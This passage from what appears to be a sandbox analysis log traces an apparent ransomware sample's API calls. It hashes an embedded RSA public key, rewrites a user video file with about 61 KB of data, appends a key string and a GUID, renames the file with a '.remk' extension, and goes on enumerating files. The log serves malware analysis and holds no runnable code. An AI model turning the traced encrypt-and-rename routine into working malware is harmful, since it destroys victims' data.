KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.888] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.888] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.889] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.889] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.889] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.889] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.889] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.889] GetLastError () returned 0x0 [0237.889] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.889] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.890] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.890] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.890] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xefa0) returned 0x37cf820 [0237.890] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.890] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.890] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf528 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf570 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.891] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.891] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.891] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcac8 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bcab0 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.892] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.892] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.893] GetCurrentThreadId () returned 0x314 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6ef0 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.893] GetCurrentThreadId () returned 0x314 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.893] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.893] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb10 [0237.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0237.894] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.894] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcb28 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcaf8 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcb40 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcae0 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.895] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.895] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb10 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb40 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.896] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcae0 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcb28 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0237.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf570 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b6580 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.898] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0xef9f, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0xef9f, lpOverlapped=0x0) returned 1 [0237.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.898] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xefa4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.899] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.899] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.899] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.899] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.899] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.899] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.899] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.900] CloseHandle (hObject=0x640) returned 1 [0237.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c78d8 [0237.906] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0237.907] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c78d8 | out: hHeap=0x630000) returned 1 [0237.907] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\pEQk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\peqk.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\TNlwUISWdF VQwLUr\\pEQk.flv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\tnlwuiswdf vqwlur\\peqk.flv.remk")) returned 1 [0237.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.908] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.908] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.909] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0237.909] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46e56f90, ftCreationTime.dwHighDateTime=0x1d5d8fb, ftLastAccessTime.dwLowDateTime=0xac544580, ftLastAccessTime.dwHighDateTime=0x1d5e586, ftLastWriteTime.dwLowDateTime=0xac544580, ftLastWriteTime.dwHighDateTime=0x1d5e586, nFileSizeHigh=0x0, nFileSizeLow=0xefa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pEQk.flv", cAlternateFileName="")) returned 0 [0237.909] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.910] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.910] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.910] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.910] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.910] RtlAllocateHeap 